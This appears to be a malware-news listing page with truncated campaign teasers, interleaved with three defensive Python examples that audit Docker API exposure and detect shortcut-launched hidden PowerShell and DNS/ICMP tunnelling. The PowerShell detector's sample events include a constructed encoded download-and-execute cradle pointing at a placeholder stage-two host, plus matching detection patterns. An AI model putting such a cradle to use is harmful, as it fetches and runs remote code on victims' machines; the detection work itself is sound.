Malware

New FileFix variant spreads StealC malware via multilingual phishing site

Cybersecurity researchers are tracking a fresh campaign that uses a new FileFix variant to deliver the StealC information stealer malware. The attack relies on a convincing, multilingual phishing site, advanced obfuscation, and anti-analysis tricks to avoid detection, according to an Acronis researcher, Eliad Kimhy, in a report shared with The Hacker News. How the attack […]

Over 180 npm packages targeted by self-replicating worm to steal credentials in recent supply chain attack

Cybersecurity researchers have uncovered a major software supply chain attack targeting the npm registry, compromising more than 180 packages in its initial phase and eventually spreading to over 500 packages. The attack leverages a self-replicating worm, making it one of the most serious threats seen in the JavaScript ecosystem.

How the Attack Works

The malicious

Tor-based cryptojacking attack spreads through misconfigured Docker APIs

Cybersecurity experts have recently uncovered an evolved form of a cryptojacking campaign that leverages the Tor network to target misconfigured Docker APIs. Akamai, which identified this activity in August 2025, reported that the attackers attempt to lock down exposed Docker APIs to prevent other threat actors from gaining access. This development expands on Trend Micro’s
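The misconfiguration this campaign depends on is a Docker Engine API reachable over TCP without TLS client authentication. The audit below is an added example, not code from the Akamai or Trend Micro reports: it reads a daemon.json, flags tcp:// listeners that have no TLS or no tlsverify, and shows the weak configuration beside a hardened one. The two configurations are constructed; the keys it inspects (hosts, tls, tlsverify, tlscacert, tlscert, tlskey) are the real dockerd daemon.json options.

```python
"""Audit a Docker daemon.json for an exposed, unauthenticated Engine API."""
import json
from urllib.parse import urlparse

# Constructed: remote API open to anyone who can reach the port (no TLS, no auth).
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed: same remote access, but only for clients presenting a cert signed by our CA.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tls": True,
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Bind addresses that expose the listener on every interface.
WILDCARD_BINDS = {"", "0.0.0.0", "::", "[::]"}


def audit_daemon_config(daemon_json: str) -> list[str]:
    """Return severity-tagged findings; an empty list means no remote-exposure issue."""
    cfg = json.loads(daemon_json)
    findings = []
    tls_verify = bool(cfg.get("tlsverify"))
    tls_on = bool(cfg.get("tls")) or tls_verify

    for host in cfg.get("hosts", []):
        u = urlparse(host)
        if u.scheme != "tcp":
            continue  # unix:// and fd:// sockets are gated by filesystem permissions
        bind = u.hostname or ""
        if not tls_on:
            findings.append(f"CRITICAL: {host} serves the Engine API in plaintext with no authentication")
        elif not tls_verify:
            findings.append(f"HIGH: {host} uses TLS but does not require a client certificate (tlsverify off)")
        if bind in WILDCARD_BINDS:
            findings.append(f"MEDIUM: {host} binds every interface; restrict to a management address or firewall it")
        if u.port == 2375 and tls_on:
            findings.append(f"LOW: {host} uses 2375, conventionally the plaintext port; prefer 2376 for TLS")

    if tls_verify:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if not cfg.get(key):
                findings.append(f"HIGH: tlsverify is set but {key} is not configured; "
                                "dockerd falls back to its default certificate paths")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(f"[{label}]")
        for finding in audit_daemon_config(cfg) or ["no findings"]:
            print("  ", finding)
```

Run it against a copy of /etc/docker/daemon.json; the MEDIUM finding on the hardened config is deliberate, since a wildcard bind with client-certificate authentication is acceptable only when the port is also firewalled to management hosts.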

GPUGate Malware Leverages Google Ads and Fake GitHub Commits to Target IT Companies

Cybersecurity experts have uncovered a new malware campaign, codenamed GPUGate, that exploits Google Ads and manipulated GitHub commits to deliver malicious payloads. This operation primarily targets IT and software development companies in Western Europe and has been active since at least December 2024. Unlike typical malvertising attacks, this campaign introduces a unique twist. The attackers

TAG-150 Hackers Use Custom-Built Malware Families to Target Organizations

A newly identified cyber threat group known as TAG-150 has quickly established itself as a major security concern. Since March 2025, the group has demonstrated the ability to develop and launch multiple custom-built malware families, showcasing both technical skill and rapid evolution. Their arsenal includes CastleLoader, CastleBot, and the latest addition CastleRAT, a sophisticated Remote

XWorm Malware Uses New Infection Chain to Evade Detection by Exploiting User and System Trust

Emerging quietly in mid-2025, XWorm has transformed into a highly sophisticated backdoor malware that manipulates both user trust and system conventions to infiltrate networks. Early indications appeared when several organizations reported a surge in phishing emails containing .lnk shortcut files disguised as ordinary documents. Security analysts quickly noticed that opening these shortcuts triggered hidden PowerShell
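The chain sketched above (a .lnk that looks like a document, a hidden PowerShell process behind it) leaves a recognisable process-creation trail. The scorer below is an added example, not code from the XWorm analysis: it takes events shaped like Sysmon Event ID 1 records (ParentImage, Image, CommandLine), decodes any -EncodedCommand payload, and weights the usual hidden-window, policy-bypass and download-cradle flags. The two events and the encoded payload are constructed; the second-stage URL is a placeholder under the reserved .invalid TLD.

```python
"""Score process-creation events for the shortcut-to-hidden-PowerShell pattern."""
import base64
import re
from typing import Optional

# Constructed stage-two one-liner, the kind of thing a malicious .lnk's target field carries.
_STAGE_TWO = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
_ENCODED = base64.b64encode(_STAGE_TWO.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # user double-clicked a shortcut in Explorer; it launched hidden, encoded PowerShell
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell.exe -NoP -W Hidden -Ep Bypass -Enc {_ENCODED}",
    },
    {   # scheduled maintenance script: same binary, nothing odd about the invocation
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1",
    },
]

_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# (pattern, weight, reason) applied to the raw command line plus any decoded payload.
_INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), 1, "profile skipped"),
    (re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I), 2, "execution policy bypass"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2, "Invoke-Expression"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 2, "download cradle"),
    (re.compile(r"frombase64string", re.I), 1, "base64 decoding"),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the -EncodedCommand payload (base64 of UTF-16LE) as text, or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict) -> dict:
    """Weighted score plus the reasons behind it; non-PowerShell images score 0."""
    image = event["Image"].lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return {"score": 0, "reasons": [], "decoded": None}
    score, reasons = 0, []
    if event["ParentImage"].lower().endswith("\\explorer.exe"):
        score += 2
        reasons.append("spawned by explorer.exe (interactive launch, e.g. a double-clicked .lnk)")
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        score += 2
        reasons.append("-EncodedCommand present")
    haystack = event["CommandLine"] + "\n" + (decoded or "")
    for rx, weight, reason in _INDICATORS:
        if rx.search(haystack):
            score += weight
            reasons.append(reason)
    return {"score": score, "reasons": reasons, "decoded": decoded}


def triage(events: list, threshold: int = 5) -> list:
    """Events at or above the threshold, highest score first."""
    scored = [dict(e, **score_event(e)) for e in events]
    return sorted((s for s in scored if s["score"] >= threshold), key=lambda s: -s["score"])


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"])
        print("  decoded:", hit["decoded"])
```

Decoding the payload before matching matters: an operator who only greps the raw command line never sees the IEX or DownloadString inside the base64, which is exactly why loaders pass their stage through -EncodedCommand.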

New NotDoor Malware Targets Outlook Users to Steal Data and Compromise Systems

A newly discovered backdoor, linked to the infamous Russian cyber-espionage group APT28 (Fancy Bear), is targeting Microsoft Outlook users. The malware enables attackers to steal sensitive information, upload malicious files, and execute commands to take full control of compromised devices.

What is NotDoor?

Researchers at LAB52, the threat intelligence division of Spanish cybersecurity firm S2

MystRodX Exploits DNS and ICMP Channels to Steal Data From Compromised Systems

A newly uncovered backdoor malware known as MystRodX has raised alarms in the cybersecurity community. Operating silently for more than 20 months, this advanced threat has been able to exfiltrate sensitive information using covert communication techniques that bypass standard defenses. Initially mistaken for a Mirai botnet variant, MystRodX is far more dangerous. Instead of relying
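DNS and ICMP make useful covert channels because both are usually allowed outbound and rarely inspected beyond volume. The detector below is an added example, not code from the MystRodX analysis, and it generalises beyond the page: for DNS it groups queries by registered domain and flags domains that receive many unique, long, high-entropy labels (the signature of data chunked into subdomains); for ICMP it flags hosts whose echo requests carry payloads that match neither the Windows nor the Linux ping pattern. The log lines and ICMP records are constructed, and the "last two labels" domain grouping is a simplification that ignores the public suffix list.

```python
"""Flag DNS-tunnel-like queries and odd ICMP echo payloads in constructed logs."""
import hashlib
import math
from collections import Counter, defaultdict

# Constructed DNS query log: "<timestamp> <client> <qname> <qtype>"
SAMPLE_DNS_LOG = """\
2025-09-01T10:00:01Z 10.0.0.5 www.example.com A
2025-09-01T10:00:02Z 10.0.0.5 mail.example.com MX
2025-09-01T10:00:03Z 10.0.0.7 q7x2kp9dmz4wnlc3vtygfjr8.t.example.net TXT
2025-09-01T10:00:04Z 10.0.0.7 b3h8nz5qvk2xmwpe9jyt4dcu.t.example.net TXT
2025-09-01T10:00:05Z 10.0.0.7 z9c4vgm2xq7kpn8wbdy3htj5.t.example.net TXT
2025-09-01T10:00:06Z 10.0.0.7 m5w8kz3nqv2jxr7ycd9hbgt4.t.example.net TXT
2025-09-01T10:00:07Z 10.0.0.5 cdn.example.com A
"""

# Default echo-request payloads: Windows sends a fixed 32-byte alphabet,
# Linux ping sends a timestamp followed by the incrementing bytes 0x10..0x37.
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"
LINUX_PING_TAIL = bytes(range(0x10, 0x38))


def _blob(i: int) -> bytes:
    """Constructed 64-byte pseudo-random payload standing in for encrypted chunks."""
    return hashlib.sha512(f"chunk{i}".encode()).digest()


# Constructed ICMP echo-request summaries: (src, dst, payload)
SAMPLE_ICMP = [
    ("10.0.0.5", "10.0.0.1", WINDOWS_PING),
    ("10.0.0.5", "10.0.0.1", WINDOWS_PING),
    ("10.0.0.9", "10.0.0.1", b"\x00" * 16 + LINUX_PING_TAIL),
    ("10.0.0.7", "203.0.113.10", _blob(1)),
    ("10.0.0.7", "203.0.113.10", _blob(2)),
    ("10.0.0.7", "203.0.113.10", _blob(3)),
    ("10.0.0.7", "203.0.113.10", _blob(4)),
]


def shannon_entropy(data) -> float:
    """Bits per symbol of a str or bytes value."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def registered_domain(qname: str) -> str:
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])  # simplification: no public suffix list


def detect_dns_tunnel(log_text: str, min_unique=3, min_label_len=20, min_entropy=3.5) -> list:
    """Domains receiving >= min_unique distinct long, high-entropy leftmost labels."""
    per_domain = defaultdict(lambda: {"clients": set(), "labels": set(), "qtypes": Counter()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, qtype = line.split()
        dom = registered_domain(qname)
        entry = per_domain[dom]
        entry["clients"].add(client)
        entry["qtypes"][qtype] += 1
        first = qname.rstrip(".").split(".")[0]
        if qname.rstrip(".") != dom and len(first) >= min_label_len:
            entry["labels"].add(first)
    findings = []
    for dom, entry in per_domain.items():
        if len(entry["labels"]) < min_unique:
            continue
        avg = sum(shannon_entropy(lbl) for lbl in entry["labels"]) / len(entry["labels"])
        if avg >= min_entropy:
            findings.append({"domain": dom, "unique_labels": len(entry["labels"]),
                             "avg_entropy": round(avg, 2), "clients": sorted(entry["clients"]),
                             "qtypes": dict(entry["qtypes"])})
    return findings


def looks_like_normal_ping(payload: bytes) -> bool:
    return payload == WINDOWS_PING or payload.endswith(LINUX_PING_TAIL)


def detect_icmp_channel(records, min_unusual=3) -> list:
    """Sources sending >= min_unusual distinct echo payloads that match no known ping pattern."""
    per_src = defaultdict(list)
    for src, _dst, payload in records:
        if not looks_like_normal_ping(payload):
            per_src[src].append(payload)
    findings = []
    for src, payloads in per_src.items():
        distinct = set(payloads)
        if len(distinct) >= min_unusual:
            avg = sum(shannon_entropy(p) for p in distinct) / len(distinct)
            findings.append({"src": src, "unusual_packets": len(payloads),
                             "distinct_payloads": len(distinct), "avg_entropy": round(avg, 2)})
    return findings


if __name__ == "__main__":
    print("DNS:", detect_dns_tunnel(SAMPLE_DNS_LOG))
    print("ICMP:", detect_icmp_channel(SAMPLE_ICMP))
```

The thresholds are starting points, not tuned values: CDNs and some security products legitimately use long hashed labels, so in production pair the DNS rule with an allow-list of known domains and with the query-type mix (TXT and NULL dominate tunnels), and pair the ICMP rule with a per-host baseline of payload sizes.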

Android Droppers Now Deliver SMS Stealers and Spyware, Not Just Banking Trojans

Cybersecurity experts have noticed a notable shift in Android malware campaigns, where dropper apps—traditionally used to deliver banking trojans—are now distributing simpler malicious software such as SMS stealers and lightweight spyware. According to a report by ThreatFabric last week, these campaigns often impersonate government or banking apps in India and other Asian countries. The Dutch

ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics

Discovery of New Campaign

Cybersecurity experts have identified a fresh phishing operation conducted by the North Korean state-sponsored threat group ScarCruft (APT37). The attackers are using a well-known malware called RokRAT to infiltrate systems and steal sensitive information. Researchers at Seqrite Labs named this campaign Operation HanKook Phantom, noting that the attacks are aimed at
